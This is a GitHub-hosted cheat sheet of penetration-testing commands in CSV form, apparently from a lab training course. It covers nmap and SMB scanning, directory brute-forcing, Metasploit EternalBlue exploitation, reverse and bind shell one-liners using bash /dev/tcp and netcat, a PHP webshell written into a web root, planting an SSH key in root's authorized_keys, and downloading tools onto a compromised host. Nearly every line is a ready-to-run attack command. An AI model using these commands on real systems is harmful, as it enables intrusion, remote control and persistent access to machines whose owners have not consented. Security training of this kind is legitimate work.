-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcommands.txt
More file actions
47 lines (47 loc) · 4.1 KB
/
commands.txt
File metadata and controls
47 lines (47 loc) · 4.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
Service Scanning,nmap 10.129.42.253,Run nmap on an IP
Service Scanning,nmap -sV -sC -p- 10.129.42.253,Run an nmap script scan on an IP
Service Scanning,locate scripts/citrix,List various available nmap scripts
Service Scanning,nmap --script smb-os-discovery.nse -p445 10.10.10.40,Run an nmap script on an IP
Service Scanning,netcat 10.10.10.10 22,Grab banner of an open port
Service Scanning,smbclient -N -L \\\\10.129.42.250,List SMB Shares
Service Scanning,smbclient \\\\10.129.42.253\\users,Connect to an SMB share
Service Scanning,snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0,Scan SNMP on an IP
Service Scanning,onesixtyone -c dict.txt 10.129.42.254,Brute force SNMP secret string
Web Enumeration,gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt,Run a directory scan on a website
Web Enumeration,gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt,Run a sub-domain scan on a website
Web Enumeration,curl -IL https://www.inlanefreight.com,Grab website banner
Web Enumeration,whatweb 10.10.10.121,List details about the webserver/certificates
Web Enumeration,curl 10.10.10.121/robots.txt,List potential directories in robots.txt
Web Enumeration,ctrl+U,View page source (in Firefox)
Public Exploits,searchsploit openssh 7.2,Search for public exploits for a web application
Public Exploits,msfconsole,MSF: Start the Metasploit Framework
Public Exploits,search exploit eternalblue,MSF: Search for public exploits in MSF
Public Exploits,use exploit/windows/smb/ms17_010_psexec,MSF: Start using an MSF module
Public Exploits,show options,MSF: Show required options for an MSF module
Public Exploits,set RHOSTS 10.10.10.40,MSF: Set a value for an MSF module option
Public Exploits,check,MSF: Test if the target server is vulnerable
Public Exploits,exploit,MSF: Run the exploit on the target server is vulnerable
Using Shells,nc -lvnp 1234,Start a nc listener on a local port
Using Shells,bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1',Send a reverse shell from the remote server
Using Shells,rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc 10.10.10.10 1234 >/tmp/f,Another command to send a reverse shell from the remote server
Using Shells,rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/bash -i 2>&1\|nc -lvp 1234 >/tmp/f,Start a bind shell on the remote server
Using Shells,nc 10.10.10.1 1234,Connect to a bind shell started on the remote server
Using Shells,python -c 'import pty; pty.spawn("/bin/bash")',Upgrade shell TTY (1)
Using Shells,ctrl+z then stty raw -echo then fg then enter twice,Upgrade shell TTY (2)
Using Shells,echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php,Create a webshell php file
Using Shells,curl http://SERVER_IP:PORT/shell.php?cmd=id,Execute a command on an uploaded webshell
Privilege Escalation,./linpeas.sh,Run linpeas script to enumerate remote server
Privilege Escalation,sudo -l,List available sudo privileges
Privilege Escalation,sudo -u user /bin/echo Hello World!,Run a command with sudo
Privilege Escalation,sudo su -,Switch to root user (if we have access to sudo su)
Privilege Escalation,sudo su user -,Switch to a user (if we have access to sudo su)
Privilege Escalation,ssh-keygen -f key,Create a new SSH key
Privilege Escalation,echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys,Add the generated public key to the user
Privilege Escalation,ssh root@10.10.10.10 -i key,SSH to the server with the generated private key
Transferring Files,python3 -m http.server 8000,Start a local webserver
Transferring Files,wget http://10.10.14.1:8000/linpeas.sh,Download a file on the remote server from our local machine
Transferring Files,curl http://10.10.14.1:8000/linenum.sh -o linenum.sh,Download a file on the remote server from our local machine
Transferring Files,scp linenum.sh user@remotehost:/tmp/linenum.sh,Transfer a file to the remote server with scp (requires SSH access)
Transferring Files,base64 shell -w 0,Convert a file to base64
Transferring Files,echo f0VMR...SNIO...InmDwU \| base64 -d > shell,Convert a file from base64 back to its original
Transferring Files,md5sum shell,Check the file's md5sum to ensure it converted correctly